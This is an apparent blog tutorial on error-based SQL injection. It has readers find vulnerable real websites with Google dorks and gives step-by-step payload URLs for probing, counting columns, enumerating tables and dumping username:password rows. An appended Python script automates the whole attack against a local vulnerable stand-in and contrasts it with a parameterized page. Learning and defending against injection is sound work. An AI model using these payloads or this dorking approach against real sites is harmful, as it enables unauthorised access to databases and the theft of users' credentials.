By: Romansh Yadav
January 29, 2017

Error Based SQL Injection: Best practices and projects

Estimated reading time: 3.5 minutes

Hello Leaders,

Today I'm going to talk about the second part of the SQL injection article. First, I want to explain the purpose of error-based SQL injection. Don't worry, it's very simple.

RETRIEVING DATA FROM THE DATABASE

Today, SQL injection is mostly used for bypassing a login form, gaining access to an admin panel, or retrieving data. Bypassing a login form is a different case: nothing is read back, the injected condition simply makes the login query succeed. When the page prints neither query results nor database errors, blind SQL injection is the technique to fall back on. In this article, I will talk about error-based SQL injection.

As the name suggests, error based means everything is driven by the errors the page shows. In this attack, we send something to the server in the URL, the server shows us an error, and that error tells us what the next step will be. Strictly speaking, the detection and column counting below rely on the error messages, and the data is then pulled out with a UNION query; the whole procedure only works when the page echoes database errors and prints query results in the HTML.

First, we have to find a website that is vulnerable to error-based SQL injection. Go to Google and search for pages that take a numeric id parameter, for example:

inurl:index.php?id=
inurl:gallery.php?id=

The next goal is to find out whether our page is actually talking to a database or not:

https://www.example.com/gallery.php?id=6

To find this out, we just put a single quote after the id number, like this:

http://www.example.com/gallery.php?id=6'

If it shows an error, and the error is a SQL syntax error, then this page is connected to a database and the website is vulnerable. What the single quote does is break the query: the quote is pasted straight into the SQL statement, so the statement no longer has valid syntax and the database returns a syntax error, which the page prints.

Now we know the website is vulnerable, we just need to find the number of columns in the query. Again we are going to inject something that produces an error. We sort the result by column position and raise the position one at a time:

http://www.example.com/gallery.php?id=6 order by 1
http://www.example.com/gallery.php?id=6 order by 2
http://www.example.com/gallery.php?id=6 order by 3

We keep going until the page shows an "Unknown column" error. If that error appears at order by N, the query has N-1 columns, because order by N-1 still showed the page content.

Now we are going to find out which columns are printed on the current page, so that we know which of them we can use. Technically those columns are not "vulnerable"; they are just the ones the page renders. Inject a UNION with one marker number per column (N-1 markers in total):

http://www.example.com/gallery.php?id=-6 union all select 1,2,3,4,N-1

The id is changed to a value that returns no row (here -6), so the only row the page has to render is the injected one and the marker numbers become visible. If the page shows 2 and 4, then columns 2 and 4 are the ones rendered by the current page, and those are the only positions through which we can read data back. The next step is to find out the version and the database name, using either position 2 or position 4:

http://www.example.com/gallery.php?id=-6 union all select 1,version(),3,4,N-1
http://www.example.com/gallery.php?id=-6 union all select 1,database(),3,4,N-1

We can find other information in the same way. One thing every person should keep in mind is: the more information you have, the more powerful you will be. If the MySQL version is 5.0.0 or higher, the server has the information_schema database. information_schema is like an index of all databases, tables, and columns.

Our next step is to find out all the table names. To do this, we again inject a query:

http://www.example.com/gallery.php?id=-6 union all select 1,group_concat(table_name),3,4,N-1 from information_schema.tables where table_schema=database()--

It will show all the table names of the current database, joined by commas. The trailing -- comments out whatever the page appends after our injection.

Our next step is to find out the columns of one table. Take any table name and convert it into a MySQL CHAR() expression (HackBar has a "MySQL CHAR()" function for this), so that the payload contains no quotes; for example, the table name users becomes char(117,115,101,114,115). Paste it into the query:

http://www.example.com/gallery.php?id=-6 union all select 1,group_concat(column_name),3,4,N-1 from information_schema.columns where table_name=char(...)--

Now that we have the column names, our final step is to get the data, because we have the database name, the table name, and the column names. The table name here must be the same one we converted to CHAR() when finding the columns, and column_name must be replaced by the real column names we just found, for example username and password:

http://www.example.com/gallery.php?id=-6 union all select 1,group_concat(username,0x3a,password,0x0a),3,4,N-1 from users--

0x3a is the hex value of a colon (:) and 0x0a is the hex value of a newline, so each row of the table is printed on its own line as username:password (a comma would be 0x2c).

Hope this information will help you to become more knowledgeable in error-based SQL injection.

Thanks & Best Regards.
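The whole procedure above, as an added example that is not part of the original article: a constructed stand-in for gallery.php that concatenates the id into its query, the attacker-side steps (quote probe, ORDER BY column counting, marker UNION, data extraction), and the hardened version of the same page that the procedure fails against. It uses SQLite so it runs offline; the MySQL names from the article are different and are noted in comments (sqlite_version() for version(), sqlite_master and pragma_table_info() for information_schema, char(10) for 0x0a, || for concat). The table layouts, sample rows, and function names are all assumptions made for this example.

```python
import re
import sqlite3


def setup_db():
    """Constructed sample database: a gallery table and a users table to steal from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gallery (id INTEGER, title TEXT, path TEXT, views INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO gallery VALUES (?,?,?,?)",
                     [(6, "Sunset", "/img/6.jpg", 120), (7, "Harbour", "/img/7.jpg", 45)])
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "admin", "s3cr3t"), (2, "bob", "hunter2")])
    return conn


def vulnerable_gallery(conn, user_id):
    """gallery.php?id=<user_id>: the id is concatenated into the SQL (deliberately vulnerable).
    Only columns 2 (title) and 4 (views) reach the HTML, and database errors are echoed."""
    sql = "SELECT id, title, path, views FROM gallery WHERE id = " + user_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return "SQL error: " + str(e)
    return "".join(f"<h1>{r[1]}</h1><p>{r[3]} views</p>" for r in rows) or "No such image"


def safe_gallery(conn, user_id):
    """Hardened gallery.php: validate the id, then bind it as a parameter."""
    if not re.fullmatch(r"-?\d+", user_id):
        return "Bad request"
    rows = conn.execute("SELECT id, title, path, views FROM gallery WHERE id = ?",
                        (int(user_id),)).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[3]} views</p>" for r in rows) or "No such image"


def is_injectable(page, base_id="6"):
    """Step 1: the single-quote probe; a database error means the id reached the parser."""
    return page(base_id + "'").startswith("SQL error")


def count_columns(page, base_id="6", limit=20):
    """Step 2: ORDER BY n until it errors; the first failing n minus one is the column count."""
    for n in range(1, limit + 1):
        if page(f"{base_id} ORDER BY {n}").startswith("SQL error"):
            return n - 1
    return None


def displayed_columns(page, ncols, base_id="6"):
    """Step 3: UNION a row of marker numbers under a non-existent id; see which ones render."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"-{base_id} UNION ALL SELECT {markers}")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", html)]


def to_char(s):
    """Quote-free string literal, the CHAR() trick the article applies with HackBar."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def union_extract(page, ncols, expression, from_clause="", base_id="6"):
    """Steps 4-6: put an expression in displayed column 2 and read it back from the <h1>."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[1] = expression
    html = page(f"-{base_id} UNION ALL SELECT {','.join(cols)} {from_clause}".rstrip())
    m = re.search(r"<h1>(.*?)</h1>", html, re.S)
    return m.group(1) if m else None


def run_attack(page):
    """Drive the article's procedure against a page callable; None if the probe finds nothing."""
    if not is_injectable(page):
        return None
    ncols = count_columns(page)
    result = {"columns": ncols, "displayed": displayed_columns(page, ncols)}
    # MySQL: version(); information_schema.tables; information_schema.columns
    result["version"] = union_extract(page, ncols, "sqlite_version()")
    result["tables"] = union_extract(page, ncols, "group_concat(name)",
                                     "FROM sqlite_master WHERE type=" + to_char("table"))
    result["user_columns"] = union_extract(page, ncols, "group_concat(name)",
                                           "FROM pragma_table_info(" + to_char("users") + ")")
    # char(58) is ':' and char(10) the newline separator; in SQLite 0x0a would be the integer 10
    result["dump"] = union_extract(page, ncols,
                                   "group_concat(username||char(58)||password, char(10))",
                                   "FROM users")
    return result


if __name__ == "__main__":
    db = setup_db()
    print(run_attack(lambda uid: vulnerable_gallery(db, uid)))
    print(run_attack(lambda uid: safe_gallery(db, uid)))  # None: no error ever leaks
```

Running it prints the column count (4), the rendered positions ([2, 4]), the table list, the users columns, and the username:password dump for the vulnerable page, and None for the parameterized page, where the quote probe gets a "Bad request" instead of a database error and the procedure never gets past step 1.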